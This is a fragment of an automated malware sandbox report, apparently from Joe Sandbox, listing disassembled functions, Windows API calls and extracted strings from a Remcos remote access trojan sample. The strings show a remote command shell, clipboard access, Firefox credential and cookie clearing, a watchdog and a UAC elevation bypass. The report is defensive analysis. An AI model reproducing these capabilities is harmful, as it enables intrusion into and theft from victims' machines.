                                                                                                                                                                        • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                        • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                                                        • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                                                                                                      • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                                                                                        • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                                                        • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                                                        • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                                                        • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                                                                                                      • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                                                                                                                                        • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                                                      • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                                                                                                      • API String ID: 1067849700-181434739
                                                                                                                                                                      • Opcode ID: 723e9607c72da18c04fb96a30cc69216cf02b4fb0b27d516460f97d5e16f4c98
                                                                                                                                                                      • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                                                                                                      • Opcode Fuzzy Hash: 723e9607c72da18c04fb96a30cc69216cf02b4fb0b27d516460f97d5e16f4c98
                                                                                                                                                                      • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                                                                                                      APIs
                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                                                                                      • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                                                                                                      • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                                                                                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                                                                                      • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                                                                                        • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                                                                                                                      • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                      • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                                                                                                      • API String ID: 2994406822-18413064
                                                                                                                                                                      • Opcode ID: 2738b66809f9be532c93b7807b1d1b3d9a0da56b16418f0236a29b17ab6fa86b
                                                                                                                                                                      • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                                                                                                                      • Opcode Fuzzy Hash: 2738b66809f9be532c93b7807b1d1b3d9a0da56b16418f0236a29b17ab6fa86b
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                                                                                        • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                                        • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                                                        • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                                                                                                      • OpenMutexA.KERNEL32 ref: 00412181
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                                                                      • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                                                                      • API String ID: 3018269243-13974260
                                                                                                                                                                      • Opcode ID: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                                                                                                                                      • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                                                                                                      • Opcode Fuzzy Hash: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                                                                                                                                      • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                      • API String ID: 1164774033-3681987949
                                                                                                                                                                      • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                                                      • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                                                                                                      • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                                                      • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenClipboard.USER32 ref: 004168FD
                                                                                                                                                                      • EmptyClipboard.USER32 ref: 0041690B
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                                                                                                      • CloseClipboard.USER32 ref: 00416990
                                                                                                                                                                      • OpenClipboard.USER32 ref: 00416997
                                                                                                                                                                      • GetClipboardData.USER32 ref: 004169A7
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                                                      • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                      • String ID: !D@
                                                                                                                                                                      • API String ID: 3520204547-604454484
                                                                                                                                                                      • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                                                                      • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                                                                                                      • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                                                                      • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$Close$File$FirstNext
                                                                                                                                                                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                      • API String ID: 3527384056-432212279
                                                                                                                                                                      • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                                                      • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                                                                                                      • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                                                      • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 297527592-0
                                                                                                                                                                      • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                                                                      • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                                                                                                      • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                                                                      • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                                                                                                                                        • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                        • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                                                                      • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                                                                      • API String ID: 3756808967-1743721670
                                                                                                                                                                      • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                                                                                                      • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                                                                                                      • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                                                                                      • API String ID: 0-1861860590
                                                                                                                                                                      • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                                                                      • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                                                                                                      • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                                                                      • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                                                                                                      APIs
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0040755C
                                                                                                                                                                      • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Object_wcslen
                                                                                                                                                                      • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                      • API String ID: 240030777-3166923314
                                                                                                                                                                      • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                                                      • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                                                                                                      • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                                                      • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                                                                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041A84C
                                                                                                                                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3587775597-0
                                                                                                                                                                      • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                                                      • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                                                                                                      • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                                                      • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                      • String ID: JD$JD$JD
                                                                                                                                                                      • API String ID: 745075371-3517165026
                                                                                                                                                                      • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                                                      • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                                                                                                      • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                      • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                      • API String ID: 1164774033-405221262
                                                                                                                                                                      • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                                                                                                                                      • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                                                                                                      • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                                                                                                                                      • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                                                                                                                        • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
